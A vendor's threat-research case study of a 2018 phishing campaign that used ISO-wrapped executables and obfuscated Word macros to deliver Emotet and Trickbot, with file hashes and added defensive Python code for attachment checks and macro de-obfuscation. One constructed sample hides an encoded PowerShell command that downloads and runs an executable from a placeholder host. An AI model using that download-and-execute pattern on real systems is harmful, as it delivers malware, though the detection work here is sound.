Case Study

The Evolution Of a Recent Attack Campaign.

By Perception Point Research
28 March, 2018

How hackers can make variations within one campaign –
as seen in a recent customer attack we blocked.

On Wednesday 3.21.2018, one of our customers received a series of malicious emails across their organization. While it is not clear whether the attacks were coordinated, they appeared to be part of a larger campaign run by criminals seeking financial profit. Our platform blocked all of these attempts before they reached the end user; however, had they reached the users, the varying methods used could easily have tricked someone.

The attackers started the campaign with a simple attempt to send an executable file to several employees in the organization. After failing the first time, they progressively enhanced their techniques, adding complexity in order to bypass traditional cyber security solutions.

Here is a brief overview of each step in the campaign:

Phase 1.

An executable file attached to an email.

While sending a “.exe” file as an email attachment is prohibited by most email servers, sending it inside an “.iso” file is apparently allowed (specifically in Office365). This requires minimal effort from the attackers, and since Windows 10 automatically mounts an ISO file as a virtual DVD drive, it is very easy for an unskilled user to run the file. Once the user runs the file, it installs a malicious trojan on their computer.

In the screenshot of the original email below, you can see that the file name is made to look like a PDF and that the email pretends to be a DHL package notification.


Similar emails were sent to several employees in a short period of time, all attempting to deliver a variant of the same executable file. Here are hashes of such iso & exe files:

3829238055 ,pdf.iso
5b19f5deb3391ea68bdd964e00ee97d7267bbb7f45cd7af65b67fb7c129f7f33

PO 5302,pdf.exe
960f4c577b0eeb65c157a9d4ca20c0b53a5e1a55f56b7aa75ba35547db676ba8
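As an added example (not part of the original case study or of Perception Point's product), here is a small Python attachment check that flags the two Phase 1 tricks: an ISO container with a Windows executable inside it, and a decoy “,pdf.exe” / “,pdf.iso” name. Because ISO 9660 stores file contents as raw contiguous bytes, scanning the whole image for an MZ header whose e_lfanew points at a PE signature finds an executable without parsing the directory tree; the stub ISO and PE built in the block are constructed test inputs, and the decoy-name pattern is an assumption.

```python
import re
import struct

ISO_MAGIC_OFFSET = 0x8001   # ISO 9660 primary volume descriptor starts with "CD001" here
# Assumed pattern: a decoy "pdf" token right before the real extension, e.g. "PO 5302,pdf.exe".
DECOY_RE = re.compile(r"[.,_ \-]pdf\.(exe|iso|scr|js)$", re.IGNORECASE)

def is_iso_image(data: bytes) -> bool:
    """True if the bytes carry the ISO 9660 volume descriptor signature."""
    return data[ISO_MAGIC_OFFSET:ISO_MAGIC_OFFSET + 5] == b"CD001"

def find_embedded_pe(data: bytes) -> int:
    """Offset of the first 'MZ' header whose e_lfanew points at 'PE\\0\\0', or -1."""
    pos = data.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            if data[pos + e_lfanew:pos + e_lfanew + 4] == b"PE\x00\x00":
                return pos
        pos = data.find(b"MZ", pos + 1)
    return -1

def classify_attachment(name: str, data: bytes) -> dict:
    """Verdict for one attachment: its name, the flags raised and whether to block it."""
    flags = []
    if DECOY_RE.search(name):
        flags.append("decoy-pdf-extension")
    if is_iso_image(data):
        flags.append("iso-container")          # often allowed by gateways, unlike a bare .exe
        if find_embedded_pe(data) != -1:
            flags.append("executable-inside-iso")
    elif find_embedded_pe(data) == 0:
        flags.append("bare-executable")
    return {"name": name, "flags": flags, "block": bool(flags)}

def build_stub_pe() -> bytes:
    """Constructed input: the smallest header layout the PE check accepts."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", hdr, 0x3C, 0x40)    # e_lfanew -> offset 0x40
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 20

def build_stub_iso(payload: bytes) -> bytes:
    """Constructed input: 32 KiB system area, one volume descriptor sector, then the payload."""
    return bytes(0x8000) + b"\x01CD001\x01" + bytes(0x800 - 7) + payload
```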

On the same day, we encountered the exact same trojan files at another customer with whom we were conducting a trial, indicating a possibly widespread campaign.

Phase 2.

An obfuscated macro inside a word document.

After a few unsuccessful attempts with the first technique, the attackers switched to using a link instead of an attachment to deliver the malicious trojan. Again, the email posed as a package tracking notification allegedly sent by DHL, and contained a link to a fake receipt doc file.

Analyzing the doc file, we found that it includes a VB script macro designed to be invoked automatically as soon as the victim opens the document in Microsoft Word. It was quite easy to tell that this macro script is suspicious, because it was fully obfuscated.

Code obfuscation is essentially the use of programming-language features, such as string manipulation or mathematical operations, to hide malicious code by making it scrambled, unclear and unreadable. Sometimes the goal is just to make it difficult for human researchers to understand.

More importantly, it is used to prevent static engines from detecting the malicious patterns of the code, like new process execution, file dropping, registry operations, and other exploitation techniques.

The document was detected by only 3 of 60 static engines in VirusTotal at the time the email was sent, which tells us that the obfuscation was pretty successful. This shows once again that code obfuscation techniques easily bypass detection engines based on static analysis.

A snippet from the original obfuscated macro script:

Beneath all of the aforementioned obfuscation, this macro script extracts an encrypted PowerShell command, which runs an executable file downloaded from a remote HTTP server. Analysing this file reveals that it is a trojan called Emotet, designed to collect financial information from the infected computer.
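As an added example (not the original macro, which the post shows only as a screenshot), the following Python de-obfuscator resolves the string tricks described above (Chr() arithmetic, concatenation, StrReverse), decodes the encoded PowerShell command it recovers, and checks the result for download-and-execute indicators. The obfuscated macro line, the placeholder URL and the indicator list are constructed assumptions.

```python
import base64
import re

# Pieces a VBA macro can use to hide a string: Chr() with simple arithmetic,
# StrReverse() over a literal, and plain literals joined with '&' or '+'.
CHR_RE = re.compile(r"Chr\(\s*(\d+)\s*(?:([+\-*])\s*(\d+))?\s*\)", re.I)
REV_RE = re.compile(r'StrReverse\("([^"]*)"\)', re.I)
LIT_RE = re.compile(r'"([^"]*)"')
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
# Assumed download-and-execute indicators to look for once the text is readable.
INDICATORS = ("downloadfile", "downloadstring", "invoke-webrequest", "start-process", ".exe")

def resolve_chr(expr: str) -> str:
    """Replace Chr(n), Chr(a+b), Chr(a-b) and Chr(a*b) with the quoted character."""
    def repl(m):
        a, op, b = int(m.group(1)), m.group(2), m.group(3)
        n = a if op is None else {"+": a + int(b), "-": a - int(b), "*": a * int(b)}[op]
        return '"' + chr(n) + '"'
    return CHR_RE.sub(repl, expr)

def deobfuscate(expr: str) -> str:
    """Evaluate a string expression built from literals, Chr() and StrReverse().
    Assumes no Chr(34) (a quote character) and no StrReverse over non-literals."""
    expr = REV_RE.sub(lambda m: '"' + m.group(1)[::-1] + '"', resolve_chr(expr))
    return "".join(LIT_RE.findall(expr))          # concatenation is just joining the pieces

def decode_encoded_powershell(cmd: str) -> "str | None":
    """Decode the base64 UTF-16LE payload of a -e/-enc/-EncodedCommand switch."""
    m = ENC_RE.search(cmd)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None

def analyze_macro(line: str) -> dict:
    """Static verdict for one obfuscated macro statement."""
    cmd = deobfuscate(line)
    decoded = decode_encoded_powershell(cmd)
    text = (decoded or cmd).lower()
    hits = [i for i in INDICATORS if i in text]
    return {"command": cmd, "decoded": decoded, "indicators": hits,
            "suspicious": "powershell" in cmd.lower() and bool(hits)}

def build_sample_macro() -> str:
    """Constructed input: an obfuscated 'powershell -e <b64>' line with a placeholder URL."""
    script = "Invoke-WebRequest http://example.invalid/receipt.exe -OutFile r.exe; Start-Process r.exe"
    b64 = base64.b64encode(script.encode("utf-16-le")).decode()
    return ('Chr(112) & Chr(100+11) & Chr(119) & StrReverse("sre") & Chr(2*52) & Chr(101) '
            '& Chr(108) & Chr(110-2) & Chr(32) & Chr(45) & Chr(101) & Chr(32) & "' + b64 + '"')
```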


The executable hash is f759bedc1953d63c131d1cbbf641ceb1.
Some of the servers from which the exe files are downloaded are:

Phase 3.

A fake source pretending to be DocuSign.

One day after the previous incidents, the same customer got an email from a fake source pretending to be DocuSign. A Word document file was attached to this email, and once again it had an obfuscated macro script that downloads and executes another banking trojan.


The executable hash is 4598fe6c73be9f241006dfb35a76704a and it is probably a variant of Trickbot (banking trojan).

Quote from the customer.

“Integrating Perception Point’s platform into our Office365 instance was quick and seamless with absolutely no impact to our email delivery service levels, and in less than a month they’ve already blocked a potentially damaging attack that could have easily tricked our users and caused a serious disruption. It’s rare that I see immediate returns that quickly”
James Rutt, CIO/CISO, Dana Foundation.
